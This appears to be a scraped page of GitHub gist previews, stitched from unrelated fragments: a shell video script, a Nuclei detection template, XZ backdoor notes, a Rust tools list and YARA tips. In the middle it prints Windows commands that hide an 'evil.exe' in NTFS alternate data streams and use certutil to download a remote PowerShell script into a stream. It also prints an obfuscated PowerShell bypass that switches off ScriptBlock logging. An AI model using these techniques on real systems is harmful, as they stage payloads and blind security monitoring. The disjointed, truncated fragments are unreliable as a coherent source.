| #!/bin/sh | |
| print_usage() { | |
| echo "usage: compress_video <input_file>" | |
| echo "supported formats: mp4, webm, mkv, mov, avi, flv" | |
| } | |
| get_extension() { | |
| f="${1##*/}" | |
| case "$f" in |
| id: suspicious-extensions-rce | |
| info: | |
| name: Suspicious File Extensions - Potential RCE | |
| author: Nullenc0de | |
| severity: medium | |
| description: Detects files with potentially suspicious extensions that could be used for Remote Code Execution (RCE). Scan your AppData folder. | |
| file: | |
| - extensions: |
| XZ Backdoor symbol deobfuscation. Updated as i make progress |
This is a living document. Everything in this document is made in good faith of being accurate, but like I just said; we don't yet know everything about what's going on.
Update: I've disabled comments as of 2025-01-26 to avoid everyone having notifications for something a year on if someone wants to suggest a correction. Folks are free to email to suggest corrections still, of course.
Note: I have moved this list to a proper repository. I'll leave this gist up, but it won't be updated. To submit an idea, open a PR on the repo.
Note that I have not tried all of these personally, and cannot and do not vouch for all of the tools listed here. In most cases, the descriptions here are copied directly from their code repos. Some may have been abandoned. Investigate before installing/using.
The ones I use regularly include: bat, dust, fd, fend, hyperfine, miniserve, ripgrep, just, cargo-audit and cargo-wipe.
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
| # ScriptBlock Logging Bypass | |
| # @cobbr_io | |
| $GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static') | |
| If ($GroupPolicyField) { | |
| $GroupPolicyCache = $GroupPolicyField.GetValue($null) | |
| If ($GroupPolicyCache['ScriptB'+'lockLogging']) { | |
| $GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0 | |
| $GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0 | |
| } |
This Gist has been transfered into a Github Repo. You'll find the most recent version here.
When creating your rules for YARA keep in mind the following guidelines in order to get the best performance from them. This guide is based on ideas and recommendations by Victor M. Alvarez and WXS.
